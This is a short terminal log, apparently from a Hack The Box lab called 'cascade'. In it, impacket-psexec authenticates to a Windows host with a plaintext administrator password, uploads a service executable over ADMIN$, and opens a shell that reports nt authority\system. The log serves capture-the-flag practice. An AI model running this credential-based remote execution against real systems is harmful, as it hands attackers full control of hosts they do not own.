┌──(kali㉿kali)-[~/htb/cascade] └─$ impacket-psexec cascade.local/administrator:'baCT3r1aN00dles'@10.129.41.255 Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.129.41.255..... [*] Found writable share ADMIN$ [*] Uploading file wftdhUmI.exe [*] Opening SVCManager on 10.129.41.255..... [*] Creating service AkJx on 10.129.41.255..... [*] Starting service AkJx..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system C:\Windows\system32>
